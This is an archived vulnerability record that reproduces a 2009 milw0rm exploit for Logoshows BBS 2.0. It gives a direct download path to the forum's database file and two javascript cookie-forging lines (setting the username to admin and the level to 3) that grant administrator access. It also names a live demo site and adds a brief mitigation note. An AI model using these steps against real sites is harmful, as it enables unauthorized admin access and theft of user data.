Logoshows BBS 2.0 DD

vendor:

BBS

by:

milw0rm.com

8,8

CVSS

HIGH

Cookie Injection

CWE

Product Name: BBS

Affected Version From: 2.0

Affected Version To: 2.0

Patch Exists: NO

Related CWE: N/A

CPE: a:logoshows:bbs:2.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2009

Logoshows BBS 2.0 is vulnerable to cookie injection. An attacker can inject malicious cookies into the application by using the javascript code provided in the exploit. This can be used to gain administrative access to the application.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in cookies.

Source

Exploit-DB raw data:

Logoshows BBS 2.0 DD

ZoRLu

yildirimordulari.com - z0rlu.blogspot.com - turkguvenligi.info

ref: http://www.milw0rm.com/exploits/9389

vuln:

http://www.logoshows.com/bbs/database/globepersonnel.mdb

Logoshows BBS 2.0 ICH

yildirimordulari.com - z0rlu.blogspot.com - turkguvenligi.info

ref: http://www.milw0rm.com/exploits/9389

demo:

http://www.logoshows.com/bbs/globepersonnel_login.asp

exploit: 

javascript:document.cookie = "pb%5Fusername=admin; path=/";

exploit: 

javascript:document.cookie = "level=3; path=/";

after you go here:


after go here:

http://www.logoshows.com/bbs/globepersonnel_reply.asp?id=6&topic=6&recordnum=0

thanks: str0ke and all friends

# milw0rm.com [2009-08-07]